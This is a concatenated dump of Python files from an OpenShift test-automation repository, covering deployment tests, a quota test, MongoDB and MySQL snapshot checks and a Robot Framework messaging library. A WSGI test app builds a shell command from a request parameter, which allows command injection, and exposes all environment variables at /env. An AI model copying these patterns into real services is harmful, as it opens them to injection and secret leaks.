pexpect.spawn(cmd)\n for line in child.readlines():\n match = None\n if self.app_type.split('-')[0] in ('jbossas', 'jbosseap'):\n if 'jre' in line or 'standalone.sh' in line:\n print line\n match = re.search(r'^\\d+\\s+(\\d+)', line, re.M)\n elif 'jbossews' in self.app_type:\n if 'jbossews//bin/tomcat' in line:\n #if 'java' in line:\n match = 
re.search(r'^\\d+\\s+(\\d+)', line, re.M)\n else:\n if 'httpd -C Include' in line:\n match = re.search(r'^\\d+\\s+(\\d+)', line, re.M)\n if match:\n if match.group(1) not in pids:\n pids.append(int(match.group(1)))\n pids.sort()\n return pids\n\n def compare_pid(self, lst1, lst2):\n if len(lst1) > len(lst2):\n return False\n for i in range(len(lst1)):\n if lst1[i] != lst2[i]:\n return False\n return True\n\n def test_method(self):\n # Create app\n ret = common.create_app(self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True, \"./\", self.scalable)\n self.assert_equal(ret, 0, \"App creation failed\")\n # Add hot_deploy marker\n ret = common.command_get_status(\"touch %s/.openshift/markers/hot_deploy\" % (self.app_name))\n self.assert_equal(ret, 0, \"Failed to create hot_deploy marker\")\n # Record the pids\n pid_lst1 = self.get_pids(self.app_name)\n print 'pid list: %s' % pid_lst1\n self.assert_not_equal(len(pid_lst1), 0, \"Failed to get pid\")\n # Make some changes and git push\n self.str1 = 'Welcome to OpenShift'\n self.str2 = common.getRandomString()\n cmd = \"sed -i -e 's/%s/%s/g' %s/%s\" % (self.str1, self.str2, self.app_name, self.file_path[self.test_variant])\n ret = common.command_get_status(cmd)\n self.assert_equal(ret, 0, \"Failed to modify the app\")\n # Git push all the changes\n (ret, output) = common.command_getstatusoutput(\"cd %s && git add . && git commit -amt && git push\" % (self.app_name))\n self.assert_equal(ret, 0, \"Failed to git push\")\n self.assert_not_match('Waiting for stop to finish', output, \"'Waiting for stop to finish' shouldn't be found in the output\")\n # Verify the changes\n ret = common.check_web_page_output(self.app_name, '', self.str2)\n self.assert_equal(ret, 0, \"The changes doesn't take effect\")\n # Get the pid and compare\n pid_lst2 = self.get_pids(self.app_name)\n print 'pid before git push: %s' % (pid_lst1)\n print 'pid after git push: %s' % (pid_lst2)\n self.assert_not_equal(len(pid_lst2), 0, \"Failed to get pid\")\n ret = self.compare_pid(pid_lst1, pid_lst2)\n self.assert_true(ret, 'PID changed after deploying')\n # Create jenkins server\n ret = common.create_app(\"jenkins\", common.app_types['jenkins'])\n self.assert_equal(ret, 0, \"Failed to create jenkins server\")\n # Add jenkins-client to the app\n ret = common.embed(self.app_name, 'add-' + common.cartridge_types['jenkins'])\n self.assert_equal(ret, 0, \"Failed to add jenkins-client to the app\")\n # Make some changes\n self.str1 = self.str2\n self.str2 = common.getRandomString()\n cmd = \"sed -i -e 's/%s/%s/g' %s/%s\" % (self.str1, self.str2, self.app_name, self.file_path[self.test_variant])\n ret = common.command_get_status(cmd)\n self.assert_equal(ret, 0, \"Failed to modify the app\")\n # Git push all the changes\n ret = common.trigger_jenkins_build(self.app_name)\n self.assert_true(ret, \"Failed to do jenkins build\")\n # Verify the changes\n ret = common.check_web_page_output(self.app_name, '', self.str2)\n self.assert_equal(ret, 0, \"The changes doesn't take effect\")\n # Compare the pids\n pid_lst1 = pid_lst2\n pid_lst2 = self.get_pids(self.app_name)\n print 'pid before git push: %s' % (pid_lst1)\n print 'pid after git push: %s' % (pid_lst2)\n self.assert_not_equal(len(pid_lst2), 0, \"Failed to get pid\")\n ret = self.compare_pid(pid_lst1, pid_lst2)\n self.assert_true(ret, 'PID changed after deploying')\n return self.passed()\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = 
OpenShiftTestSuite(conf)\n suite.add_test(HotDeploy)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.584561288356781, "alphanum_fraction": 0.5884125828742981, "avg_line_length": 33.119998931884766, "blob_id": "134793d197f3a7d58a90a18577af2db0f7f25392", "content_id": "13b8171886056fafdbffd74cf9ecd5dc03dd0ba7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5972, "license_type": "no_license", "max_line_length": 107, "num_lines": 175, "path": "/automation/parallel/Communicate.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from Queue import Queue\nfrom threading import Event\ntry:\n from multiprocessing.managers import BaseManager\nexcept ImportError:\n class Python26Required(object):\n def __call__(self, *args):\n raise RuntimeError('Requires Python > 2.6')\n def __getattr__(self, name):\n raise RuntimeError('Requires Python > 2.6')\n BaseManager = Python26Required()\n\nclass _create_caching_getter(object):\n\n def __init__(self, clazz):\n self._clazz = clazz\n self._objects = {}\n\n def __call__(self, key):\n if key not in self._objects:\n self._objects[key] = self._clazz()\n return self._objects[key]\n\nclass Communicate(object):\n \"\"\"Library for communication between processes.\n For example this can be used to handle communication between processes of the Parallel robot library.\n \n Requires Python 2.6\n \n Example:\n \n Process 1 test file:\n | *Settings* |\n | Library | Communicate |\n \n \n | *Test Cases* |\n | Communicator |\n | | [Setup] | Start Communication Service |\n | | Send Message To | my message queue | hello world! |\n | | ${message}= | Receive Message From | other message queue |\n | | Should Be Equal | ${message} | hello! |\n | | [Teardown] | Stop Communication Service |\n \n Process 2 test file:\n | *Settings* |\n | Library | Communicate | ${process 1 ip address if on a different machine} |\n \n \n | *Test Cases* |\n | Helloer |\n | | ${message}= | Receive Message From | my message queue |\n | | Should Be Equal | ${message} | hello world! |\n | | Send Message To | other message queue | hello! |\n \n \"\"\"\n\n def __init__(self, address='127.0.0.1', port=2187):\n \"\"\"\n `address` of the communication server.\n `port` of the communication server.\n \"\"\"\n self._address = address\n self._port = int(port)\n self._authkey = 'live long and prosper'\n self._queue = None\n self._connected = False\n\n def _connect(self):\n self._create_manager().connect()\n self._connected = True\n\n def start_communication_service(self):\n \"\"\"Starts a communication server that will be used to share messages and objects between processes.\n \"\"\"\n self._create_manager(_create_caching_getter(Queue),\n _create_caching_getter(Event)).start()\n self._connected = True\n\n def stop_communication_service(self):\n \"\"\"Stops a started communication server. 
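It shuts down the manager process started by 'start_communication_service'.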
\n This ensures that the server and the messages that it has don't influence the next tests.\n To ensure that this keyword really happens place this in the teardown section.\n \"\"\"\n self._manager.shutdown()\n self._connected = False\n\n def _create_manager(self, queue_getter=None, event_getter=None):\n BaseManager.register('get_queue', queue_getter)\n BaseManager.register('get_event', event_getter)\n self._manager = BaseManager((self._address, self._port), self._authkey)\n return self._manager\n\n def send_message_to(self, queue_id, value):\n \"\"\"Send a message to a message queue.\n\n `queue_id` is the identifier for the queue.\n\n `value` is the message. This can be a string, a number or any serializable object.\n\n Example:\n In one process\n | Send Message To | my queue | hello world! |\n ...\n In another process\n | ${message}= | Receive Message From | my queue |\n | Should Be Equal | ${message} | hello world! |\n \"\"\"\n self._get_queue(queue_id).put(value)\n\n def receive_message_from(self, queue_id, timeout=None):\n \"\"\"Receive and consume a message from a message queue.\n By default this keyword will block until there is a message in the queue.\n\n `queue_id` is the identifier for the queue.\n\n `timeout` is the time out in seconds to wait.\n\n Returns the value from the message queue. Fails if timeout expires.\n\n Example:\n In one process\n | Send Message To | my queue | hello world! |\n ...\n In another process\n | ${message}= | Receive Message From | my queue |\n | Should Be Equal | ${message} | hello world! |\n \"\"\"\n timeout = float(timeout) if timeout is not None else None\n return self._get_queue(queue_id).get(timeout=timeout)\n\n def _get_queue(self, queue_id):\n if not self._connected:\n self._connect()\n return self._manager.get_queue(queue_id)\n\n def wait_for_event(self, event_id, timeout=None):\n \"\"\"Waits until event with `event_id` is signaled.\n Fails if optional timeout expires.\n\n `timeout` is the time out in seconds to wait.\n\n Example:\n In one process\n | Wait For Event | my event |\n ...\n In another process\n | Signal Event | my event |\n \"\"\"\n timeout = float(timeout) if timeout is not None else None\n self._get_event(event_id).wait(timeout=timeout)\n #NOTE! 
If Event#clear is ever exposed it has to be secured (for example r/w lock) that none\n #of the processes can do it while another is at this position.\n if not self._get_event(event_id).isSet():\n raise Exception('Timeout')\n\n def signal_event(self, event_id):\n \"\"\"Signals an event.\n If a process is waiting for this event it will stop waiting after the signal.\n\n `event` is the identifier for the event.\n\n Example:\n In one process\n | Wait For Event | my event |\n ...\n In another process\n | Signal Event | my event |\n \"\"\"\n return self._get_event(event_id).set()\n\n def _get_event(self, event_id):\n if not self._connected:\n self._connect()\n return self._manager.get_event(event_id)\n\n" }, { "alpha_fraction": 0.5195916295051575, "alphanum_fraction": 0.5281456708908081, "avg_line_length": 32.55555725097656, "blob_id": "29d9814be6d89c664deb709cd68c3b3b9587e105", "content_id": "ff398b5fe770f7f7700d54bdf8ffa045ed64d9fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3624, "license_type": "no_license", "max_line_length": 101, "num_lines": 108, "path": "/automation/open/testmodules/RT/limits/file_capacity.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.app_name = common.getRandomString(10)\n self.app_type = common.app_types['php']\n self.file_size_limit = 1048576\n tcms_testcase_id=122321\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n os.system(\"rm -Rf %s\" % ( self.app_name ))\n\n\nclass FileCapacity(OpenShiftTest):\n def test_method(self):\n\n step=testcase.TestCaseStep(\n \"Create an %s app: %s\" % (self.app_type, self.app_name),\n common.create_app,\n function_parameters = [self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd,\n True],\n expect_description = \"App should be created successfully\",\n expect_return = 0)\n self.steps_list.append(step)\n\n every_cap = 500000\n left_limit = self.file_size_limit\n i = 0\n while left_limit > 0:\n if left_limit > every_cap:\n step = testcase.TestCaseStep(\n \"generate a %dK size file\"% every_cap,\n \"dd if=/dev/zero bs=1K count=%d of=%s/bigfile%s\"% (every_cap, self.app_name, i),\n expect_return = 0)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\n \"Git push codes\",\n \"cd %s && git add . && git commit -am 'update app' && git push\" % self.app_name,\n expect_return = 0,\n unexpect_string_list = ['Disk quota exceeded'])\n #expect_string_list = ['remote rejected'])\n self.steps_list.append(step)\n else:\n step = testcase.TestCaseStep(\n \"generate a %dK size file\" %(left_limit),\n \"dd if=/dev/zero bs=1K count=%d of=%s/bigfile%s\" %(left_limit, self.app_name, i),\n expect_return = 0)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\n \"Git push codes\",\n \"cd %s && git add . 
&& git commit -am 'update app' && git push\" % self.app_name,\n expect_string_list = ['Disk quota exceeded'])\n #expect_string_list = ['remote rejected'])\n self.steps_list.append(step)\n\n\n left_limit = left_limit - every_cap\n i = i + 1\n\n step=testcase.TestCaseStep(\n \"Destroy app: %s\" % (self.app_name),\n common.destroy_app,\n function_parameters = [self.app_name],\n expect_return = 0)\n self.steps_list.append(step)\n \n case = testcase.TestCase(\"[rhc-limits] file size limit\", self.steps_list)\n case.run()\n \n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(FileCapacity)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5629578232765198, "alphanum_fraction": 0.5685385465621948, "avg_line_length": 43.10769271850586, "blob_id": "f45014e3aecac9d5ac016f0dcdf54544854f37c1", "content_id": "10257dde2c01ab0e1bf5365960c63790350cebfb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2867, "license_type": "no_license", "max_line_length": 113, "num_lines": 65, "path": "/automation/open/testmodules/RT/cartridge/app_template/bigdata/datadir/application", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os\nimport commands\nfrom cgi import escape\nfrom urlparse import parse_qs\n\nvirtenv = os.environ['APPDIR'] + '/virtenv/'\nos.environ['PYTHON_EGG_CACHE'] = os.path.join(virtenv, 'lib/python2.6/site-packages')\nvirtualenv = os.path.join(virtenv, 'bin/activate_this.py')\ntry:\n execfile(virtualenv, dict(__file__=virtualenv))\nexcept IOError:\n pass\n#\n# IMPORTANT: Put any additional includes below this line. 
If placed above this\n# line, it's possible required libraries won't be in your searchable path\n# \n\ndef application(environ, start_response):\n parameters = parse_qs(environ.get('QUERY_STRING', ''))\n ctype = 'text/plain'\n if environ['PATH_INFO'] == '/health':\n response_body = \"1\"\n elif environ['PATH_INFO'] == '/env':\n response_body = ['%s: %s' % (key, value)\n for key, value in sorted(environ.items())]\n response_body = '\\n'.join(response_body)\n elif environ['PATH_INFO'] == '/create':\n if 'size' in parameters:\n size = escape(parameters['size'][0])\n else:\n size = '300'\n cmd = 'dd if=/dev/urandom of=%sbigfile bs=1M count=%s' % (os.environ['OPENSHIFT_DATA_DIR'], size)\n (ret, output) = commands.getstatusoutput(cmd)\n response_body = '\\n'.join(['Command: %s' % (cmd), output, 'The bigfile has been created.'])\n elif environ['PATH_INFO'] == '/delete':\n cmd = 'rm -f %sbigfile' % (os.environ['OPENSHIFT_DATA_DIR'])\n (ret, output) = commands.getstatusoutput(cmd)\n response_body = '\\n'.join(['Command: %s' % (cmd), output, 'The bigfile has been deleted.'])\n elif environ['PATH_INFO'] == '/show':\n cmd = 'ls -lh %sbigfile' % (os.environ['OPENSHIFT_DATA_DIR'])\n (ret, output) = commands.getstatusoutput(cmd)\n if ret == 0:\n response_body = '\\n'.join(['Command: %s' % (cmd), output, 'The bigfile exists.'])\n else:\n response_body = '\\n'.join(['Command: %s' % (cmd), output, 'The bigfile doesnot exist.'])\n else:\n ctype = 'text/plain'\n response_body = '''[rhc-cartridge]snapshot/restore big data to new app\n[rhc-cartridge]snapshot/restore big data to existing app'''\n\n status = '200 OK'\n response_headers = [('Content-Type', ctype), ('Content-Length', str(len(response_body)))]\n #\n start_response(status, response_headers)\n return [response_body]\n\n#\n# Below for testing only\n#\nif __name__ == '__main__':\n from wsgiref.simple_server import make_server\n httpd = make_server('localhost', 8051, application)\n # Wait for a single request, serve it and quit.\n httpd.handle_request()\n" }, { "alpha_fraction": 0.5560294985771179, "alphanum_fraction": 0.5645599365234375, "avg_line_length": 32.70588302612305, "blob_id": "28ca1e0ef4a4f7852b3f26e6fd4fd928a61fb9f4", "content_id": "cb5f91b3cda4439b3b4cc1c9eea363d93af9590d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5158, "license_type": "no_license", "max_line_length": 94, "num_lines": 153, "path": "/automation/open/testmodules/RT/node/mongodb_via_rhcsh.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nLinqing Lu\[email protected]\nJan 12, 2012\n\n[US1350][Runtime][rhc-node]The mongoDB interactive shell\nhttps://tcms.engineering.redhat.com/case/126302/\n\"\"\"\n\nimport sys\nimport os\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\nimport pexpect\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.summary = \"[US1350][Runtime][rhc-node]The mongoDB interactive shell\"\n self.app_name = 'php'\n self.app_type = common.app_types[self.app_name]\n self.steps_list = []\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass MongodbViaRhcsh(OpenShiftTest):\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\n \"Create an %s app: %s\" % (self.app_type, self.app_name),\n common.create_app,\n function_parameters = [self.app_name, self.app_type, \n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd,\n 'False'],\n expect_description = \"App should 
be created successfully\",\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"embed mongodb into app %s\"% self.app_name,\n common.embed,\n function_parameters = [self.app_name, \"add-%s\"%common.cartridge_types[\"mongodb\"]],\n expect_return = 0))\n\n '''\n self.steps_list.append(testcase.TestCaseStep(\n \"embed rockmongo into app %s\"% self.app_name,\n common.embed,\n function_parameters = [self.app_name, \"add-rockmongo-1.1\"],\n expect_return = 0)\n '''\n\n self.steps_list.append(testcase.TestCaseStep(\n \"run mongo shell via rhcsh with pexpect\",\n self.mongo_shell_test,\n expect_return = 0))\n\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n def mongo_shell_test(self):\n app_url = OSConf.get_app_url(self.app_name)\n ssh_url = OSConf.get_ssh_url(self.app_name)\n db_info = OSConf.get_embed_info(self.app_name, 'mongodb-2.2')\n p = pexpect.spawn('ssh %s'% ssh_url)\n p.logfile = sys.stdout\n# index = p.expect([OSConf.get_app_url(self.app_name), pexpect.EOF, pexpect.TIMEOUT])\n\n p.expect('Welcome to OpenShift shell')\n p.expect(app_url)\n p.sendline('help')\n p.expect('Help menu:')\n p.expect('interactive MongoDB shell')\n p.sendline('mongo')\n p.expect('MongoDB shell version:')\n p.expect('connecting to:')\n p.expect('>', timeout=20)\n #p.sendcontrol('c')\n p.sendline('exit')\n p.expect('bye', timeout=20)\n p.expect('.*')\n db_path = '%s:%s/%s'% (db_info['url'], db_info['port'], db_info['database'])\n self.info(\"db_path=%s\"%db_path)\n p.sendline('mongo %s'% db_path)\n p.expect('MongoDB shell version:', timeout=30)\n p.expect('connecting to: %s'% db_path, timeout=30)\n p.expect('>')\n p.sendline('db.auth(\"%s\",\"%s\")'% (db_info['username'], db_info['password']))\n p.expect('1')\n p.expect('>')\n p.sendline('help')\n p.expect('help on db methods')\n p.expect('quit the mongo shell')\n p.expect('>')\n p.sendline('db')\n p.expect(db_info['database'])\n p.sendline('show collections')\n p.expect('system.users')\n p.sendline('db.createCollection(\"test\")')\n p.expect('{ \"ok\" : 1 }')\n p.sendline('show collections')\n p.expect('test')\n p.sendline('db.test.save({\"name\":\"lilu\"})')\n p.sendline('db.test.find()')\n p.expect('\"name\" : \"lilu\"')\n p.sendline('person=db.test.findOne({ name : \"lilu\" } )')\n p.expect('\"name\" : \"lilu\"')\n p.sendline('person.name=\"newlilu\"')\n p.expect('newlilu')\n p.sendline('db.test.save(person)')\n p.sendline('db.test.find()')\n p.expect('\"name\" : \"newlilu\"')\n p.sendline('db.test.save({\"name\":\"lilu\"})')\n p.sendline('db.test.find()')\n p.expect('\"name\" : \"newlilu\"')\n p.expect('\"name\" : \"lilu\"')\n p.sendline('db.test.remove({\"name\":\"newlilu\"})')\n p.sendline('db.test.find()')\n index = p.expect(['\"name\" : \"newlilu\"', '\"name\" : \"lilu\"', pexpect.TIMEOUT])\n if index == 0 or index == 2:\n return 1\n p.sendline('exit')\n p.expect('bye')\n p.sendline('exit')\n p.expect('Connection to %s closed.'% app_url)\n return 0\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(MongodbViaRhcsh)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set 
tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5102836489677429, "alphanum_fraction": 0.5204210877418518, "avg_line_length": 42.28691864013672, "blob_id": "09ae5aa02c20b0d6d051207eadb1da67cc7e694a", "content_id": "b9cda67152d5c2eb9cdd9654b584f825c625046e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10259, "license_type": "no_license", "max_line_length": 130, "num_lines": 237, "path": "/automation/open/testmodules/RT/client/snapshot_restore_mysql_data_to_new_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nimport common, OSConf\nimport rhtest\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.info(\"[US566][rhc-client]Archive an existing app with embedded mysql db and restore data to new created application\")\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n try:\n self.test_variant = self.get_variant()\n except:\n self.test_variant = \"jbossews\"\n\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.app_type = common.app_types[self.test_variant]\n self.app_name = common.getRandomString(10)\n if self.test_variant == \"perl\":\n file_name = \"index.pl\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/perl/index.pl\" %(self.app_name)\n url_path1 = \"index.pl?action=create\"\n url_path2 = \"index.pl?action=modify\"\n url_path3 = \"index.pl\"\n elif self.test_variant in (\"php\", \"zend\"):\n file_name = \"index.php\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/php/index.php\" %(self.app_name)\n url_path1 = \"index.php?action=create\"\n url_path2 = \"index.php?action=modify\"\n url_path3 = \"index.php\"\n elif self.test_variant in (\"ruby\", \"rack\", \"ruby-1.9\"):\n file_name = \"rack/*\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"python\", \"python-2.7\",\"python-3.3\", \"wsgi\"):\n file_name = \"application.py\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/wsgi/application\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"python\",\"wsgi\"):\n file_name = \"application.py\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/wsgi/application\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"python-2.7\"):\n file_name = \"applicationpython-2.7.py\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/wsgi/application\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"python-3.3\"):\n file_name = \"applicationpython-3.3.py\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/wsgi/application\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"jbosseap\", \"jbossas\"):\n file_name = \"test.jsp\"\n 
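# For the JBoss variants the JSP is deployed under src/main/webapp so the\n # application server compiles it on first request; the action= query\n # strings below drive the create and modify steps, while the plain JSP\n # URL is used to show the MySQL-backed data.\n 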
source_file = \"%s/data/snapshot_restore_mysql_data/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/src/main/webapp/%s\" %(self.app_name, file_name)\n url_path1 = \"%s?action=create\" %(file_name)\n url_path2 = \"%s?action=modify\" %(file_name)\n url_path3 = \"%s\" %(file_name)\n elif self.test_variant in (\"jbossews\", \"jbossews2\"):\n file_name = \"test_ews.jsp\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\"% (WORK_DIR,\n file_name)\n target_file = \"%s/src/main/webapp/%s\" %(self.app_name, file_name)\n url_path1 = \"%s?action=create\" %(file_name)\n url_path2 = \"%s?action=modify\" %(file_name)\n url_path3 = \"%s\" %(file_name)\n else:\n raise rhtest.TestIncompleteError(\"Unknown variant: %s\"%self.test_variant)\n\n self.file_name = file_name\n self.target_file = target_file\n self.source_file = source_file\n self.url_path1 = url_path1\n self.url_path2 = url_path2\n self.url_path3 = url_path3\n self.key_string1 = \"speaker1, title1\"\n self.key_string2 = \"speaker2, title2\"\n\n common.env_setup()\n\n def finalize(self):\n pass\n\nclass SnapshotRestoreMysqlDataToNewApp(OpenShiftTest):\n def test_method(self):\n self.add_step(\"Create a %s application\" %(self.app_type),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.user_email, self.user_passwd],\n expect_return=0,\n expect_description=\"App should be created successfully\")\n\n self.add_step(\"Get app url\",\n OSConf.get_app_url,\n function_parameters = [self.app_name])\n\n self.add_step(\"Enable embeded mysql for this app\",\n common.embed,\n function_parameters=[self.app_name, \"add-mysql-5.1\", self.user_email, self.user_passwd],\n expect_return=0)\n\n self.add_step(\"Copying test files to app git repo\",\n \"cp -f %s %s\" %(self.source_file, self.target_file),\n expect_return=0)\n\n if self.test_variant in (\"rack\", \"ruby\", \"ruby-1.9\"):\n modify_file = \"%s/config.ru\" %(self.app_name)\n else:\n modify_file = self.target_file\n if self.test_variant in (\"jbosseap\", \"jbossas\"):\n command = \"echo 'Skip this step for jbossas app, because these are done automatcially by jboss server at server side'\"\n elif self.test_variant in (\"jbossews\", \"jbossews2\"):\n command = ( \"cd %s/src/main/webapp/ && \"\n \" mkdir -p WEB-INF/lib && \"\n \" cp %s/../cartridge/app_template/bigdata/mysql/mysql-connector-java-5.1.20-bin.jar WEB-INF/lib/ \"\n ) % (self.app_name, WORK_DIR)\n elif self.test_variant == \"python-2.7\":\n command = \"cp -f %s/../client/data/snapshot_restore_mysql_data/setupmysql.py %s/setup.py\"\n elif self.test_variant == \"python-3.3\":\n command = \"cp -f %s/../client/data/snapshot_restore_mysql_data/setupmysql33.py %s/setup.py\"\n else:\n command=\"echo 'Nothing to do'\"\n self.add_step(\"Modify test files according to mysql info\",\n command,\n expect_return=0)\n\n self.add_step(\"Do git commit\",\n \"cd %s && git add . 
&& git commit -m test && git push\" %(self.app_name),\n expect_return=0,\n expect_description=\"File and directories are added to your git repo successfully\")\n\n self.add_step(\"Access app's URL to create mysql data\",\n \"curl -H 'Pragma: no-cache' __OUTPUT__[2]/%s\" %(self.url_path1),\n expect_return=0,\n expect_str = [\"Welcome\", self.key_string1],\n try_interval=12,\n try_count=10)\n\n self.add_step(\"Take snapshot\",\n \"rhc snapshot save %s -f %s -l %s -p '%s' %s\" \n %(self.app_name,\n \"%s.tar.gz\"%(self.app_name),\n self.user_email, \n self.user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0)\n\n self.add_step(\"Destroy app\",\n common.destroy_app,\n function_parameters=[self.app_name, \n self.user_email, \n self.user_passwd,\n True],\n expect_return=0)\n\n self.add_step(\"Re-create this application\",\n common.create_app,\n function_parameters=[self.app_name, \n self.app_type, \n self.user_email, \n self.user_passwd, \n False],\n expect_return=0,\n expect_description=\"App should be created successfully\")\n\n self.add_step(\"Re-enable embeded mysql for this app\",\n common.embed,\n function_parameters=[self.app_name, \n \"add-mysql-5.1\", \n self.user_email, \n self.user_passwd],\n expect_return=0)\n\n self.add_step(\"Restore app from snapshot\",\n \"rhc snapshot restore %s -f %s -l %s -p '%s' %s\" \n %(self.app_name,\n \"%s.tar.gz\"%(self.app_name),\n self.user_email, \n self.user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0)\n\n self.add_step(\"Stop the app\",\n common.stop_app,\n function_parameters=[self.app_name, self.user_email, self.user_passwd],\n expect_return=0)\n\n self.add_step(\"Start the app\",\n common.start_app,\n function_parameters=[self.app_name, self.user_email, self.user_passwd],\n expect_return=0)\n\n self.add_step(\"Access app's URL to check mysql data is restored\",\n \"curl -H 'Pragma: no-cache' __OUTPUT__[2]/%s\" %(self.url_path3),\n expect_return=0,\n expect_str = [\"Welcome\", self.key_string1],\n try_interval=12,\n try_count=10)\n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(SnapshotRestoreMysqlDataToNewApp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5745164752006531, "alphanum_fraction": 0.5779294371604919, "avg_line_length": 27.819671630859375, "blob_id": "03409bcc4fe6b69063f048ef7ebfdd8614f2b2f1", "content_id": "75ee7482e35c7946c00e219c62e31a2cfd0d16e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1758, "license_type": "no_license", "max_line_length": 76, "num_lines": 61, "path": "/automation/runwithjenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import os\nimport re\nimport sys\nfrom os.path import join, exists\n\nfrom robot import run\n\nimport hta2\nfrom hta2.utils import copy\nfrom hta2.run import run_project\nfrom hta2.core.exceptions import UsageError\nfrom hta2.core.management.base import BaseCommand\nfrom hta2.core.management.paramshandler import ParamsHandler\n\n\nclass Command(BaseCommand):\n\n def syntax(self):\n return \"[-option]\"\n\n def short_desc(self):\n return \"Run project with jenjins\"\n\n def long_desc(self):\n return \"Run project with jenkins. \\n \\\n If y don't want to wrirte result to tcms, add --notcms. 
